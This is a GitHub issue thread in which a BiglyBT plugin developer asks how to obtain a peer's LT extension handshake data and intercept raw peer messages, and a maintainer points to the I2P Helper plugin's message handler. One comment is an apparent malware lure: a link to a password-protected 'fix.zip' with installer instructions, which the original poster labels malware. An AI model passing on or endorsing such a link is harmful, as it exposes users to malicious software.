### ISSUE TITLE
[Plugin Development] Get LT extension information for a Peer/LT_Handshake

### ISSUE THREAD

**Issue by Ghost-chu** [BiglySoftware/BiglyBT#3366]
* Windows 11 24H2
* 3.6.0.0
```
Java 21.0.4 (64 bit)
  Azul Systems, Inc.
c:\program files\zulu\zulu-21

SWT v4964r8, win32, zoom=100, dpi=144
Windows 11 v10.0, amd64 (64 bit)
B3.6.0.0/4 az3 zh_CN
c:\program files\zulu\zulu-21

SWT v4964r8, win32, zoom=100, dpi=144
Windows 11 v10.0, amd64 (64 bit)
B3.6.0.0/4 az3 zh_CN)
```

I'm continuing to work on my BiglyBT plugin. Currently running into a new problem where I need to get a Peer supported LT Extensions (include unknown bytes).

As far as I know, in BEP this is available from LT_Handshake, so I tried to use `this.pluginInterface.getMessageManager().locateCompatiblePeers(); ` to register a listener to listen the packets from a peer.

I'm having trouble, though, because I don't seem to know how to create a Message instance of the LT_Handshake in question.

I checked the Packet for BTCancel and BTPiece (and also official plugins), but they are just converted from BiglyBT's internal Packet.  
As I tried to go further, BiglyBT's accumulation of code over the years started to confuse me.
When I turned to ChatGPT, it was clear that it couldn't provide any valuable suggestions/clues either. So I had to open an Issue here to ask.

Sorry for all the talk, so I'm trying to be clear:

* How do I get all the LT Extensions supported by a Peer, preferably the raw data to avoid any additional conversions.
* How do I listen for any Message sent by a Peer to BiglyBT, this includes both messages that can be recognized by BigltBT and unknown messages.

---

Thank you for your continued dedication to maintaining this software, even though the software's complex code has definitely thrown me into a tizzy ^^

Have a nice day.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ghost-chu** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Hi malware bro, bye malware bro.

**Comment by parg** [comment]
Unfortunately the plugin interface doesn't support everything under the sun...

The "I2P Helper Plugin" is an example of a plugin that registered and processes its own LT message types. Check out

https://github.com/BiglySoftware/BiglyBT-plugin-azneti2phelper/blob/master/org/parg/azureus/plugins/networks/i2p/I2PHelperMessageHandler.java

**Comment by Ghost-chu** [comment]
Thank you, this is very helpful. I'm also looking forward to seeing PIF improved in the future.
